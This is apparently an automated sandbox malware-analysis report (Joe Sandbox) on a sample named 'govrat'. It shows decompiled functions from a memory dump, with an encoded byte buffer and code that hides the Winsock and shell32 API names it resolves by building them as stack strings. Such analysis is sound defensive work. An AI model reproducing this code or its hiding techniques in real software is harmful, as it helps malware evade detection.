				 *((short*)(_t889 - 0x30e)) = 0xc3;
				 *((short*)(_t889 - 0x310)) = 0xb9;
				 *((short*)(_t889 - 0x312)) = 0xdb;
				 *((short*)(_t889 - 0x314)) = 0xc3;
				 *((short*)(_t889 - 0x316)) = 0xc6;
				 *((short*)(_t889 - 0x318)) = 0xdc;
				 *((short*)(_t889 - 0x31a)) = 0x83;
				 *((short*)(_t889 - 0x31c)) = 0x8a;
				 *((short*)(_t889 - 0x31e)) = 0x87;
				 *((short*)(_t889 - 0x320)) = 0x85;
				 *((short*)(_t889 - 0x322)) = 0x89;
				 *((intOrPtr*)(_t889 - 0x2f2)) = 0x8800af;
				 *((short*)(_t889 - 0x324)) = 0xaa;
				 *((short*)(_t889 - 0x326)) = 0xec;
				 *((short*)(_t889 - 0x328)) = 0x9b;
				 *((short*)(_t889 - 0x32a)) = 0xdb;
				 *((short*)(_t889 - 0x32c)) = 0xc3;
				 *((short*)(_t889 - 0x32e)) = 0x9d;
				 *((short*)(_t889 - 0x330)) = 0xc6;
				 *((short*)(_t889 - 0x332)) = 0xdb;
				 *((short*)(_t889 - 0x334)) = 0xc3;
				 *((short*)(_t889 - 0x336)) = 0xdb;
				 *((short*)(_t889 - 0x338)) = 0xc3;
				 *((short*)(_t889 - 0x33a)) = 0xdb;
				 *((short*)(_t889 - 0x33c)) = 0xc3;
				 *((short*)(_t889 - 0x33e)) = 0xdb;
				 *((short*)(_t889 - 0x340)) = 0xc3;
				 *((short*)(_t889 - 0x342)) = 0xc6;
				 *((short*)(_t889 - 0x344)) = 0xdc;
				 *((short*)(_t889 - 0x346)) = 0x89;
				 *((short*)(_t889 - 0x348)) = 0x92;
				 *((short*)(_t889 - 0x34a)) = 0xc6;
				 *((short*)(_t889 - 0x34c)) = 0x82;
				 *((short*)(_t889 - 0x34e)) = 0x83;
				 *((short*)(_t889 - 0x350)) = 0x94;
				 *((short*)(_t889 - 0x352)) = 0x83;
				 *((short*)(_t889 - 0x354)) = 0x92;
				 *((short*)(_t889 - 0x356)) = 0xdb;
				 *((short*)(_t889 - 0x358)) = 0x8f;
				 *((short*)(_t889 - 0x35a)) = 0x81;
				 *((short*)(_t889 - 0x35c)) = 0x83;
				 *((short*)(_t889 - 0x35e)) = 0xb4;
				 *((short*)(_t889 - 0x360)) = 0xec;
				 *((short*)(_t889 - 0x362)) = 0xdb;
				 *((short*)(_t889 - 0x364)) = 0xc3;
				 *((short*)(_t889 - 0x366)) = 0xdb;
				 *((short*)(_t889 - 0x368)) = 0xc3;
				 *((short*)(_t889 - 0x36a)) = 0xdb;
				 *((short*)(_t889 - 0x36c)) = 0xc3;
				 *((short*)(_t889 - 0x36e)) = 0xdb;
				 *((short*)(_t889 - 0x370)) = 0xc3;
				 *((short*)(_t889 - 0x372)) = 0xdb;
				 *((short*)(_t889 - 0x374)) = 0xc3;
				 *((short*)(_t889 - 0x376)) = 0xc6;
				 *((short*)(_t889 - 0x378)) = 0xdc;
				 *((short*)(_t889 - 0x37a)) = 0x88;
				 *((short*)(_t889 - 0x37c)) = 0x89;
				 *((short*)(_t889 - 0x37e)) = 0x8f;
				 *((short*)(_t889 - 0x380)) = 0xdb;
				 *((short*)(_t889 - 0x382)) = 0x94;
				 *((short*)(_t889 - 0x384)) = 0x83;
				 *((short*)(_t889 - 0x386)) = 0xb0;
				 *((short*)(_t889 - 0x388)) = 0xc6;
				 *((short*)(_t889 - 0x38a)) = 0xdb;
				 *((short*)(_t889 - 0x38c)) = 0x91;
				 *((short*)(_t889 - 0x38e)) = 0x89;
				 *((short*)(_t889 - 0x390)) = 0x82;
				 *((short*)(_t889 - 0x392)) = 0x88;
				 *((short*)(_t889 - 0x394)) = 0x8f;
				 *((short*)(_t889 - 0x396)) = 0xb1;
				 *((short*)(_t889 - 0x398)) = 0xec;
				 *((short*)(_t889 - 0x39a)) = 0xec;
				 *((short*)(_t889 - 0x39c)) = 0x8a;
				 *((short*)(_t889 - 0x39e)) = 0x87;
				 *((short*)(_t889 - 0x3a0)) = 0x92;
				 *((short*)(_t889 - 0x3a2)) = 0x89;
				 *((short*)(_t889 - 0x3a4)) = 0x92;
				 *((short*)(_t889 - 0x3a6)) = 0xc6;
				 *((short*)(_t889 - 0x3a8)) = 0xa4;
				 *((short*)(_t889 - 0x3aa)) = 0xab;
				 *((short*)(_t889 - 0x3ac)) = 0x82;
				 *((short*)(_t889 - 0x3ae)) = 0xc3;
				 *((short*)(_t889 - 0x3b0)) = 0xc6;
				 *((short*)(_t889 - 0x3b2)) = 0xc9;
				 *((short*)(_t889 - 0x3b4)) = 0xc6;
				 *((short*)(_t889 - 0x3b6)) = 0x83;
				 *((short*)(_t889 - 0x3b8)) = 0x83;
				 *((short*)(_t889 - 0x3ba)) = 0x94;
				 *((short*)(_t889 - 0x3bc)) = 0x80;
				 *((short*)(_t889 - 0x3be)) = 0xc6;
				 *((short*)(_t889 - 0x3c0)) = 0xa4;
				 *((short*)(_t889 - 0x3c2)) = 0xab;
				 *((short*)(_t889 - 0x3c4)) = 0x82;
				 *((short*)(_t889 - 0x3c6)) = 0xc3;
				 *((short*)(_t889 - 0x3c8)) = 0xc6;
				 *((short*)(_t889 - 0x3ca)) = 0xdc;
				 *((short*)(_t889 - 0x3cc)) = 0x8d;
				 *((short*)(_t889 - 0x3ce)) = 0xdb;
				 *((short*)(_t889 - 0x3d0)) = 0x8f;
				 *((short*)(_t889 - 0x3d2)) = 0xa2;
				 *((short*)(_t889 - 0x3d4)) = 0xc6;
				 *((short*)(_t889 - 0x3d6)) = 0x82;
				 *((short*)(_t889 - 0x3d8)) = 0x94;
				 *((short*)(_t889 - 0x3da)) = 0x87;
				 *((short*)(_t889 - 0x3dc)) = 0xae;
				 *((short*)(_t889 - 0x3de)) = 0xec;
				 *((short*)(_t889 - 0x3e0)) = 0xcf;
				 *((short*)(_t889 - 0x3e2)) = 0x82;
				 *((short*)(_t889 - 0x3e4)) = 0x83;
				 *((short*)(_t889 - 0x3e6)) = 0xdb;
				 *((short*)(_t889 - 0x3e8)) = 0x93;
				 *((short*)(_t889 - 0x3ea)) = 0xc6;
				 *((short*)(_t889 - 0x3ec)) = 0xc3;
				 *((short*)(_t889 - 0x3ee)) = 0xc3;
				 *((short*)(_t889 - 0x3f0)) = 0x93;
				 *((short*)(_t889 - 0x3f2)) = 0xc3;
				 *((short*)(_t889 - 0x3f4)) = 0xce;
				 *((short*)(_t889 - 0x3f6)) = 0xc6;
				 *((short*)(_t889 - 0x3f8)) = 0x8a;
				 *((short*)(_t889 - 0x3fa)) = 0x87;
				 *((short*)(_t889 - 0x3fc)) = 0x92;
				 *((short*)(_t889 - 0x3fe)) = 0x89;
				 *((short*)(_t889 - 0x400)) = 0x92;
				 *((short*)(_t889 - 0x402)) = 0xc6;
				 *((short*)(_t889 - 0x404)) = 0xa4;
				 *((short*)(_t889 - 0x406)) = 0xab;
				 *((short*)(_t889 - 0x408)) = 0x82;
				 *((short*)(_t889 - 0x40a)) = 0xc3;
				 *((short*)(_t889 - 0x40c)) = 0xc6;
				 *((short*)(_t889 - 0x40e)) = 0x83;
				 *((short*)(_t889 - 0x410)) = 0x83;
				 *((short*)(_t889 - 0x412)) = 0x94;
				 *((short*)(_t889 - 0x414)) = 0x80;
				 *((short*)(_t889 - 0x416)) = 0xc6;
				 *((short*)(_t889 - 0x418)) = 0xa4;
				 *((short*)(_t889 - 0x41a)) = 0xab;
				 *((short*)(_t889 - 0x41c)) = 0x82;
				 *((short*)(_t889 - 0x41e)) = 0xc3;
				 *((short*)(_t889 - 0x420)) = 0xc6;
				 *((short*)(_t889 - 0x422)) = 0xdc;
				 *((short*)(_t889 - 0x424)) = 0xab;
				 *((short*)(_t889 - 0x426)) = 0xa7;
				 *((short*)(_t889 - 0x428)) = 0xb4;
				 *((short*)(_t889 - 0x42a)) = 0xec;
				 *((short*)(_t889 - 0x42c)) = 0x95;
				 *((short*)(_t889 - 0x42e)) = 0xc3;
				 *((short*)(_t889 - 0x430)) = 0xc6;
				 *((short*)(_t889 - 0x432)) = 0xdc;
				 *((short*)(_t889 - 0x434)) = 0x83;
				 *((short*)(_t889 - 0x44e)) = 0x95;
				 *((short*)(_t889 - 0x436)) = 0x94;
				 *((short*)(_t889 - 0x450)) = 0xc3;
				 *((short*)(_t889 - 0x438)) = 0x93;
				 *((short*)(_t889 - 0x440)) = 0x92;
				 *((short*)(_t889 - 0x452)) = 0xc6;
				 *((short*)(_t889 - 0x442)) = 0x8f;
				 *((short*)(_t889 - 0x45c)) = 0xb3;
				 *((short*)(_t889 - 0x444)) = 0x8e;
				 *((short*)(_t889 - 0x45e)) = 0xb6;
				 *((short*)(_t889 - 0x446)) = 0x85;
				 *((short*)(_t889 - 0x460)) = 0xa5;
				_t520 =  *(_t889 - 0x18);
				 *((short*)(_t889 - 0x448)) = 0x94;
				 *((short*)(_t889 - 0x43a)) = 0x92;
				 *((intOrPtr*)(_t889 - 0x43e)) = 0x850083;
				 *((intOrPtr*)(_t889 - 0x44c)) = 0xa700ec;
				 *((intOrPtr*)(_t889 - 0x456)) = 0x8200c3;
				 *((intOrPtr*)(_t889 - 0x45a)) = 0xc600dc;
				 *((char*)(_t889 - 0x256)) = 0;
				_t879 = 0x9706d0;
				 *(_t889 - 0xa4) = _t520;
				if(_t520 == 0) {
					 *(_t889 - 0xa4) = 0x9706d0;
				}
				_t521 =  *(_t889 - 0x9c);
				 *(_t889 - 0xa8) = _t521;
				if(_t521 == 0) {
					 *(_t889 - 0xa8) = _t879;
				}
				_t886 =  *(_t889 - 4);
				_t522 = _t886[0x288];
				if(_t522 == 0) {
					_t523 = _t889 - 0x128;
					goto L36;
				} else {
					if(_t522 != 1) {
						_t523 = _t889 - 0x114;
						L36:
						 *(_t889 - 4) = _t523;
					} else {
						 *(_t889 - 4) = _t879;
					}
				}
				_t524 =  &(_t886[0x208]);
				_t821 =  *_t524 & 0x0000ffff;
				 *(_t889 - 0xa0) = 0x9706d4;
				if(_t821 != 0) {
					 *(_t889 - 0x94) = _t524;
				} else {
					 *(_t889 - 0xa0) = _t879;
					 *(_t889 - 0x94) = _t879;
				}
				 *(_t889 - 0x84) = 0x9706d8;
				if(_t821 == 0) {
					 *(_t889 - 0x84) = _t879;
				}
				_t525 =  *((intOrPtr*)(_t889 - 8));
				if(_t525 == 0) {
					_t525 = L0095102D(_t889 - 0x100);
				}
				_t822 =  &(_t886[0x188]);
				_t849 =  *_t822 & 0x0000ffff;
				 *(_t889 - 0x8c) = 0x9706d4;
				if(_t849 != 0) {
					 *(_t889 - 0x98) = _t822;
				} else {
					 *(_t889 - 0x8c) = _t879;
					 *(_t889 - 0x98) = _t879;
				}
				 *(_t889 - 0x88) = 0x9706d8;
				if(_t849 == 0) {
					 *(_t889 - 0x88) = _t879;
				}
				_t823 = _t889 - 0xbc;
				if( *((intOrPtr*)(_t889 - 0x90)) == 0) {
					_t823 = _t889 - 0xd0;
				}
				_t850 = _t886[0xc8] & 0x0000ffff;
				 *((intOrPtr*)(_t889 - 0x80)) = _t823;
				 *(_t889 - 0x30) = 0x9706d4;
				if(_t850 != 0) {
					_t773 =  &(_t886[0xc8]);
				} else {
					 *(_t889 - 0x30) = _t879;
					_t773 = _t879;
				}
				if(_t850 != 0) {
					_t879 = 0x9706d8;
				}
				_t851 = _t889 - 0xbc;
				if( *((intOrPtr*)(_t889 - 0x90)) == 0) {
					_t851 = _t889 - 0xd0;
				}
				_push( *(_t889 - 0xa4));
				_push( *(_t889 - 0xa8));
				_push( &(_t886[0x248]));
				_push( *(_t889 - 4));
				_push( *(_t889 - 0xa0));
				_push( *(_t889 - 0x94));
				_push( *(_t889 - 0x84));
				_push( &(_t886[0x1c8]));
				_push(_t525);
				_push( &(_t886[0x29c]));
				_push( &(_t886[0x28c]));
				_push( &(_t886[0x108]));
				_push( *(_t889 - 0x8c));
				_push( *(_t889 - 0x98));
				_push( *(_t889 - 0x88));
				_push( &(_t886[0x148]));
				_push( *((intOrPtr*)(_t889 - 0x80)));
				_push( *(_t889 - 0x30));
				_push(_t773);
				_push(_t879);
				_push( &(_t886[0x88]));
				_push(_t886[0x2ac]);
				_push(_t886[0x2ae]);
				_push(_t886[0x86]);
				_push(_t886[0x82]);
				_push(_t886[0x84]);
				_push(_t851);
				_push(_t886);
				_t532 = E00951048(_t889 - 0x460);
				_t880 =  *((intOrPtr*)(_t889 - 0x470));
				L00951000( *((intOrPtr*)(_t889 - 0x464)), _t532, _t886[0x80]);
				_t535 = E00951195(_t851, _t880, _t886, 8);
				_t826 = _t880;
				 *0x975978 = _t535;
				 *((intOrPtr*)(_t535 + 4)) = _t880;
				_t852 = _t826 + 2;
				do {
					_t881 =  *_t826;
					_t826 = _t826 + 2;
				} while (_t881 != 0);
				_t828 = _t826 - _t852 >> 1;
				_t829 = _t828 + _t828 + 2;
				 *_t535 = _t828 + _t828 + 2;
				if( *((intOrPtr*)(_t889 - 0x10)) != 0) {
					_t540 =  *((intOrPtr*)(_t889 - 0xc));
					if(_t540 != 0) {
						_t829 =  *_t540;
						 *((intOrPtr*)( *_t540 + 8))(_t540);
					}
					_t541 =  *((intOrPtr*)(_t889 - 0x14));
					if(_t541 != 0) {
						_t829 =  *_t541;
						 *((intOrPtr*)( *_t541 + 8))(_t541);
					}
				}
				if( *((intOrPtr*)(_t889 - 8)) != 0) {
					E0095115B(_t829, _t852, _t886,  *((intOrPtr*)(_t889 - 8)));
					_pop(_t829);
				}
				E0095115B(_t829, _t852, _t886,  *(_t889 - 0x9c));
				_pop(_t830);
				E0095115B(_t830, _t852, _t886,  *(_t889 - 0x18));
				_pop(_t831);
				_t538 = E0095115B(_t831, _t852, _t886, _t886);
				return _t538;
			}

0x009641c3
0x009641c3
0x009641c4
0x009641d4
0x009641dc
0x009641e0
0x00964216
0x0096421c
0x009641e2
0x009641f5
0x00964201
0x0096420b
0x0096420e
0x0096420e
0x00964223
0x0096422c
0x00964231
0x0096423a
0x0096423b
0x00964241
0x00964247
0x0096424a
0x00964256
0x0096425a
0x00964260
0x00964260
0x00964265
0x00964280
0x00964267
0x00964267
0x00964269
0x00964269
0x0096426c
0x0096426c
0x0096426f
0x00964272
0x0096427b
0x0096427b
0x00964285
0x009642a0
0x00964287
0x00964287
0x0096428a
0x0096428d
0x0096428d
0x00964290
0x00964293
0x0096429c
0x0096429c
0x009642aa
0x009642b0
0x009642b6
0x009642bb
0x009642bb
0x009642bd
0x009642be
0x009642be
0x009642c3
0x009642de
0x009642c5
0x009642c5
0x009642c7
0x009642c7
0x009642ca
0x009642ca
0x009642cd
0x009642d0
0x009642d9
0x009642d9
0x009642e3
0x009642fe
0x009642e5
0x009642e5
0x009642e8
0x009642eb
0x009642eb
0x009642ee
0x009642f1
0x009642fa
0x009642fa
0x00964309
0x0096430f
0x00964314
0x0096431b
0x0096431e
0x00964325
0x00964328
0x0096432f
0x00964332
0x00964339
0x0096433c
0x00964343
0x00964346
0x0096434d
0x00964350
0x00964357
0x0096435a
0x00964363
0x0096436c
0x00964373
0x00964376
0x0096437d
0x00964380
0x00964387
0x0096438a
0x00964391
0x00964394
0x0096439b
0x0096439e
0x009643a5
0x009643a8
0x009643af
0x009643b0
0x009643bb
0x009643c4
0x009643cb
0x009643ce
0x009643d5
0x009643d8
0x009643df
0x009643e2
0x009643e9
0x009643ec
0x009643f3
0x009643f6
0x009643fd
0x00964400
0x00964407
0x00964408
0x00964411
0x00964418
0x00964421
0x00964424
0x0096442b
0x0096442e
0x00964435
0x00964438
0x0096443f
0x00964440
0x00964449
0x0096444a
0x00964453
0x00964454
0x0096445d
0x0096445e
0x00964467
0x00964473
0x0096447f
0x0096448b
0x00964495
0x0096449e
0x009644aa
0x009644b3
0x009644bf
0x009644c9
0x009644d2
0x009644e0
0x009644ec
0x009644f6
0x00964500
0x0096450a
0x00964514
0x0096451e
0x00964528
0x00964534
0x0096453e
0x00964545
0x0096454d
0x00964559
0x00964563
0x0096456d
0x00964575
0x0096457e
0x00964588
0x00964592
0x0096459c
0x009645a5
0x009645af
0x009645b9
0x009645c0
0x009645ca
0x009645d3
0x009645dc
0x009645e5
0x009645ee
0x009645f8
0x00964602
0x0096460a
0x00964614
0x0096461e
0x00964628
0x00964631
0x0096463b
0x00964644
0x0096464d
0x00964657
0x00964660
0x0096466a
0x00964672
0x0096467e
0x00964685
0x0096468f
0x0096469c
0x009646a3
0x009646af
0x009646b8
0x009646c1
0x009646ca
0x009646d3
0x009646dd
0x009646e7
0x009646ee
0x009646fa
0x00964701
0x0096470e
0x00964717
0x00964720
0x00964729
0x00964732
0x0096473b
0x00964744
0x0096474d
0x00964756
0x0096475f
0x00964768
0x00964771
0x0096477a
0x00964784
0x0096478e
0x00964797
0x009647a4
0x009647ab
0x009647b7
0x009647c0
0x009647ca
0x009647d3
0x009647da
0x009647e4
0x009647ed
0x009647f6
0x00964800
0x00964809
0x00964812
0x0096481b
0x00964825
0x0096482e
0x00964837
0x00964840
0x0096484a
0x00964853
0x0096485d
0x00964867
0x00964871
0x0096487b
0x00964882
0x0096488f
0x00964898
0x009648a2
0x009648ab
0x009648b4
0x009648be
0x009648c7
0x009648d0
0x009648d9
0x009648e2
0x009648eb
0x009648f4
0x009648fd
0x00964906
0x0096490f
0x00964918
0x00964922
0x0096492c
0x00964936
0x0096493f
0x00964949
0x00964952
0x0096495c
0x00964965
0x0096496f
0x00964978
0x00964982
0x0096498c
0x00964995
0x0096499f
0x009649a8
0x009649b1
0x009649ba
0x009649c3
0x009649cc
0x009649d5
0x009649de
0x009649e7
0x009649f0
0x009649f9
0x00964a02
0x00964a0b
0x00964a15
0x00964a1f
0x00964a29
0x00964a33
0x00964a3c
0x00964a46
0x00964a4f
0x00964a59
0x00964a62
0x00964a6b
0x00964a75
0x00964a7f
0x00964a89
0x00964a93
0x00964a9d
0x00964aa7
0x00964ab0
0x00964ab7
0x00964ac1
0x00964acb
0x00964ad5
0x00964adf
0x00964ae9
0x00964af2
0x00964afc
0x00964b06
0x00964b10
0x00964b19
0x00964b22
0x00964b2c
0x00964b35
0x00964b3e
0x00964b45
0x00964b4f
0x00964b59
0x00964b62
0x00964b6c
0x00964b76
0x00964b80
0x00964b89
0x00964b92
0x00964b9c
0x00964ba6
0x00964baf
0x00964bb9
0x00964bc3
0x00964bcc
0x00964bd6
0x00964be0
0x00964bea
0x00964bf4
0x00964bfd
0x00964c07
0x00964c11
0x00964c1a
0x00964c23
0x00964c2d
0x00964c36
0x00964c3f
0x00964c46
0x00964c50
0x00964c59
0x00964c63
0x00964c6c
0x00964c76
0x00964c80
0x00964c8a
0x00964c94
0x00964c9e
0x00964ca7
0x00964cb1
0x00964cbb
0x00964cc5
0x00964cce
0x00964cd7
0x00964ce0
0x00964ce7
0x00964cf1
0x00964cfb
0x00964d04
0x00964d0e
0x00964d18
0x00964d22
0x00964d2b
0x00964d34
0x00964d3e
0x00964d48
0x00964d52
0x00964d5c
0x00964d65
0x00964d6e
0x00964d77
0x00964d80
0x00964d8a
0x00964d93
0x00964d9d
0x00964da4
0x00964dae
0x00964db5
0x00964dc1
0x00964dcd
0x00964dd4
0x00964dde
0x00964deb
0x00964df5
0x00964dff
0x00964e09
0x00964e10
0x00964e13
0x00964e1a
0x00964e21
0x00964e2b
0x00964e35
0x00964e3f
0x00964e49
0x00964e50
0x00964e55
0x00964e5d
0x00964e5f
0x00964e5f
0x00964e65
0x00964e6b
0x00964e73
0x00964e75
0x00964e75
0x00964e7b
0x00964e7e
0x00964e86
0x00964e9a
0x00000000
0x00964e88
0x00964e8b
0x00964e92
0x00964ea0
0x00964ea0
0x00964e8d
0x00964e8d
0x00964e8d
0x00964e8b
0x00964ea3
0x00964ea9
0x00964eac
0x00964eb9
0x009650ab
0x00964ebf
0x00964ebf
0x00964ec5
0x00964ec5
0x00964ed0
0x00964ed9
0x00964edb
0x00964edb
0x00964ee1
0x00964ee6
0x00964eee
0x00964eee
0x00964ef3
0x00964ef9
0x00964efc
0x00964f09
0x009650b6
0x00964f0f
0x00964f0f
0x00964f15
0x00964f15
0x00964f1b
0x00964f24
0x00964f26
0x00964f26
0x00964f33
0x00964f39
0x00964f3b
0x00964f3b
0x00964f41
0x00964f48
0x00964f4b
0x00964f55
0x009650c1
0x00964f5b
0x00964f5b
0x00964f5e
0x00964f5e
0x00964f63
0x00964f65
0x00964f65
0x00964f71
0x00964f77
0x00964f79
0x00964f79
0x00964f7f
0x00964f8b
0x00964f91
0x00964f92
0x00964f9b
0x00964fa1
0x00964fa7
0x00964fad
0x00964fae
0x00964fb5
0x00964fbc
0x00964fc3
0x00964fc4
0x00964fd0
0x00964fd6
0x00964fdc
0x00964fdd
0x00964fe6
0x00964fe9
0x00964fea
0x00964feb
0x00964fec
0x00964ff8
0x00964ffe
0x00965004
0x0096500a
0x00965010
0x00965011
0x00965018
0x0096501d
0x0096502a
0x00965031
0x00965036
0x0096503b
0x00965040
0x00965043
0x00965046
0x00965046
0x00965049
0x0096504c
0x00965053
0x00965059
0x0096505d
0x0096505f
0x00965061
0x00965066
0x00965068
0x0096506b
0x0096506b
0x0096506e
0x00965073
0x00965075
0x00965078
0x00965078
0x00965073
0x0096507f
0x00965084
0x00965089
0x00965089
0x00965090
0x00965095
0x00965099
0x0096509e
0x009650a0
0x009650aa

APIs

GetProcAddress.KERNEL32 ref: 009641C4
GetDiskFreeSpaceExW.KERNELBASE(?,?,?,00000000), ref: 009641DC

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00965F07, Relevance: 42.1, APIs: 6, Strings: 18, Instructions: 74
library

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00965F07(struct HINSTANCE__* __eax, _Unknown_base(*)()** __edi) {
				void* _t42;
				_Unknown_base(*)()* _t43;
				_Unknown_base(*)()* _t45;
				_Unknown_base(*)()* _t47;
				_Unknown_base(*)()* _t49;
				_Unknown_base(*)()* _t51;
				_Unknown_base(*)()* _t53;
				void* _t62;

				 *(_t62 - 4) = __eax;
				if(__eax == 0) {
					L7:
					_t42 = 0;
				} else {
					 *(_t62 - 0x30) = 0x53415357;
					 *((intOrPtr*)(_t62 - 0x2c)) = 0x74726174;
					 *((short*)(_t62 - 0x28)) = 0x7075;
					 *((char*)(_t62 - 0x26)) = 0;
					_t43 = GetProcAddress(__eax, _t62 - 0x30); // executed
					 *__edi = _t43;
					 *(_t62 - 0x3c) = 0x43415357;
					 *((intOrPtr*)(_t62 - 0x38)) = 0x6e61656c;
					 *((short*)(_t62 - 0x34)) = 0x7075;
					 *((char*)(_t62 - 0x32)) = 0;
					_t45 = GetProcAddress( *(_t62 - 4), _t62 - 0x3c); // executed
					 *(__edi + 4) = _t45;
					 *(_t62 - 0x18) = 0x74656e69;
					 *((intOrPtr*)(_t62 - 0x14)) = 0x6464615f;
					 *((short*)(_t62 - 0x10)) = 0x72;
					_t47 = GetProcAddress( *(_t62 - 4), _t62 - 0x18); // executed
					 *(__edi + 8) = _t47;
					 *(_t62 - 0x4c) = 0x68746567;
					 *((intOrPtr*)(_t62 - 0x48)) = 0x6274736f;
					 *((intOrPtr*)(_t62 - 0x44)) = 0x6d616e79;
					 *((short*)(_t62 - 0x40)) = 0x65;
					_t49 = GetProcAddress( *(_t62 - 4), _t62 - 0x4c); // executed
					 *(__edi + 0xc) = _t49;
					 *(_t62 - 0x24) = 0x74656e69;
					 *((intOrPtr*)(_t62 - 0x20)) = 0x6f746e5f;
					 *((short*)(_t62 - 0x1c)) = 0x61;
					_t51 = GetProcAddress( *(_t62 - 4), _t62 - 0x24); // executed
					 *(__edi + 0x10) = _t51;
					 *(_t62 - 0xc) = 0x686f746e;
					 *((short*)(_t62 - 8)) = 0x6c;
					_t53 = GetProcAddress( *(_t62 - 4), _t62 - 0xc); // executed
					 *(__edi + 0x14) = _t53;
					if( *__edi == 0 ||  *(__edi + 8) == 0 ||  *(__edi + 0xc) == 0 ||  *(__edi + 0x10) == 0 || _t53 == 0) {
						goto L7;
					} else {
						_t42 = 1;
					}
				}
				return _t42;
			}

0x00965f09
0x00965f0e
0x00965ffb
0x00965ffb
0x00965f14
0x00965f20
0x00965f27
0x00965f2e
0x00965f34
0x00965f37
0x00965f39
0x00965f42
0x00965f49
0x00965f50
0x00965f56
0x00965f59
0x00965f5b
0x00965f65
0x00965f6c
0x00965f73
0x00965f79
0x00965f7b
0x00965f85
0x00965f8c
0x00965f93
0x00965f9a
0x00965fa0
0x00965fa2
0x00965fac
0x00965fb3
0x00965fba
0x00965fc0
0x00965fc2
0x00965fcc
0x00965fd3
0x00965fd9
0x00965fdb
0x00965fe1
0x00000000
0x00965ff6
0x00965ff8
0x00965ff8
0x00965fe1
0x00965fff

APIs

GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00965F37
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00965F59
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00965F79
GetProcAddress.KERNEL32(?,?,?,?,?,?,?), ref: 00965FA0
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00965FC0
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00965FD9

Strings

inet, xrefs: 00965F65
e, xrefs: 00965F9A
_add, xrefs: 00965F6C
geth, xrefs: 00965F85
l, xrefs: 00965FD3
tart, xrefs: 00965F27
_nto, xrefs: 00965FB3
a, xrefs: 00965FBA
ynam, xrefs: 00965F93
WSAC, xrefs: 00965F42
inet, xrefs: 00965FAC
ostb, xrefs: 00965F8C
up, xrefs: 00965F50
up, xrefs: 00965F2E
r, xrefs: 00965F73
lean, xrefs: 00965F49
ntoh, xrefs: 00965FCC
WSAS, xrefs: 00965F20

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00965A5F, Relevance: 29.8, APIs: 3, Strings: 14, Instructions: 81
library

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00965A5F(_Unknown_base(*)()** __esi) {
				struct HINSTANCE__* _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				short _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v46;
				short _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				char _v88;
				short _t36;
				short _t37;
				short _t38;
				short _t39;
				short _t40;
				short _t41;
				struct HINSTANCE__* _t44;
				_Unknown_base(*)()* _t46;
				_Unknown_base(*)()* _t48;
				_Unknown_base(*)()* _t50;

				_t36 = 0x53;
				_v24 = _t36;
				_t37 = 0x48;
				_v22 = _t37;
				_t38 = 0x45;
				_v20 = _t38;
				_t39 = 0x4c;
				_v18 = _t39;
				_v16 = _t39;
				_t40 = 0x33;
				_v14 = _t40;
				_t41 = 0x32;
				_v12 = _t41;
				_v10 = 0;
				_push( &_v24);
				_t44 = L009BFBD9( &_v24);
				_v8 = _t44;
				if(_t44 == 0) {
					L5:
					return 0;
				}
				_push(_t55);
				_v44 = 0x72434853;
				_v40 = 0x65746165;
				_v36 = 0x6c656853;
				_v32 = 0x6574496c;
				_v28 = 0x6d;
				_t46 = GetProcAddress(_t44,  &_v44); // executed
				 *__esi = _t46;
				_v64 = 0x61504853;
				_v60 = 0x44657372;
				_v56 = 0x6c707369;
				_v52 = 0x614e7961;
				_v48 = 0x656d;
				_v46 = 0;
				_t48 = GetProcAddress(_v8,  &_v64); // executed
				 *(__esi + 4) = _t48;
				_v88 = 0x65474853;
				_v84 = 0x65705374;
				_v80 = 0x6c616963;
				_v76 = 0x646c6f46;
				_v72 = 0x61507265;
				_v68 = 0x576874;
				_t50 = GetProcAddress(_v8,  &_v88); // executed
				 *(__esi + 8) = _t50;
				if( *__esi == 0 ||  *(__esi + 4) == 0 || _t50 == 0) {
					goto L5;
				} else {
					return 1;
				}
			}

0x00965a68
0x00965a6b
0x00965a6f
0x00965a72
0x00965a76
0x00965a79
0x00965a7d
0x00965a80
0x00965a84
0x00965a88
0x00965a89
0x00965a8f
0x00965a90
0x00965a96
0x00965a9d
0x00965a9f
0x00965aa6
0x00965aab
0x00965b5d
0x00000000
0x00965b5d
0x00965ab1
0x00965abd
0x00965ac4
0x00965acb
0x00965ad2
0x00965ad9
0x00965adf
0x00965ae1
0x00965aea
0x00965af1
0x00965af8
0x00965aff
0x00965b06
0x00965b0c
0x00965b0f
0x00965b11
0x00965b1b
0x00965b22
0x00965b29
0x00965b30
0x00965b37
0x00965b3e
0x00965b45
0x00965b47
0x00965b4d
0x00000000
